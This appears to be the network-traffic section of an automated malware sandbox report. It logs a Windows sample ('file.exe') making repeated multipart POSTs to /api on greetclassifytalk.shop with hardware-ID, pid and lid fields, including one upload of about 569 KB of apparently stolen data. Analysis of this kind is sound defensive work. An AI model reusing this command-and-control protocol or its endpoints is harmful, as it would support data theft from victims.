                                                    2024-04-25 11:33:02 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:02 UTC804INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=ajvb5nhpbg5ntuv7k9d97do8ca; expires=Mon, 19-Aug-2024 05:19:41 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D11JI%2FfsWDxkYZdkxalNFJZoQ%2BFfjF4yHbUbM6BHlVHGRzubTT%2BWFm2ng2ytaxTKF1vpfmZiSJAV4TNVwCRXSALKG1egKyba8UVQTKByq91qE7j5q45g9Xw3djvWG5cAYuiAyb67aokK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e041088b044eb-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                    Data Ascii: 11ok 185.152.66.230
                                                    2024-04-25 11:33:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449734104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:03 UTC288OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 20432
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:03 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                    Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                    2024-04-25 11:33:03 UTC808INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=8f6n69aeb7njllav75r9jutra2; expires=Mon, 19-Aug-2024 05:19:42 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6BWxjhfPtRcEoeH%2BriHjVfgLIqpl33lwcbHWahorsJmt9jNwIkPABVV0XZJ%2BHSK0Wx7MF%2BwHMAeF61rcBFu7Ry4CK4C7AOx30zMMk3O%2B%2Berm2MUGCbMdxyYksdgob4uXakTboibGh5F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e0416ad924564-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                    Data Ascii: 11ok 185.152.66.230
                                                    2024-04-25 11:33:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449735104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:04 UTC287OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 5433
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:04 UTC5433OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:04 UTC806INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=l1rcis5l9chrt8mmeh4b3trrb0; expires=Mon, 19-Aug-2024 05:19:43 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2VPA4uLG71TBdPU8Avt72nNaNY0EXyYo2EvgXfHoy%2Ff9NPcmudu9APegxcguaV4CE0%2BL7k2MxsN8ccRtOz%2FkiM4sdNDZozZ4SJyL144%2B77DUVi0MWJOTVmR8SxbDnBvPKDsfFUmV6el"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e041cfeb712e9-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                    Data Ascii: 11ok 185.152.66.230
                                                    2024-04-25 11:33:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449736104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:04 UTC287OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1378
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:04 UTC1378OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:05 UTC806INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=9ve41s1gnbtokkgi3dq9umtmsp; expires=Mon, 19-Aug-2024 05:19:44 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6q3PsKdE5O3Kb0DnC97nyOplslcvjbCqkmiNG8NQHa4B%2FtNJndQJjxwZ1M9LOqQXJ7vfgtSDuIEgLR7E%2F1jLT2NjTx5Pb3oU2k6C4L4gUsUS5iDX0elzl4%2FjgDCTmJkYx2IGRjAiC%2FmH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e042229914578-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                    Data Ascii: 11ok 185.152.66.230
                                                    2024-04-25 11:33:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449737104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:06 UTC289OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 569440
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 47 47 3c 57 7f be d5 10 d2 86 db 54 27
                                                    Data Ascii: Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H36:PG7<GG<WT'
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d 28 0d c5 f8 68 f6 22 bc 6c 5e d8 f8 e1
                                                    Data Ascii: h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}(h"l^
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da 3c 56 ec a8 fd c9 7f 89 ed d5 e1 d7 f3
                                                    Data Ascii: IW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ<V
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 90 f5 e0 26 e7 bc 0e a1 fd 4c f4 76 4c
                                                    Data Ascii: Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}&LvL
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e b0 b0 d3 ce 6e 6b df 45 a1 1b 89 2e 68
                                                    Data Ascii: [:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}nkE.h
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca 3e 4a e7 3c 85 f2 ee 92 9f 19 7c 28 38
                                                    Data Ascii: %z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<>J<|(8
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 a9 00 e6 75 53 75 c7 07 ba 63 da d8 44
                                                    Data Ascii: !CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfbuSucD
                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a db a5 8a c8 24 52 d2 9e 04 31 f1 ba e9
                                                    Data Ascii: ~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot*$R1
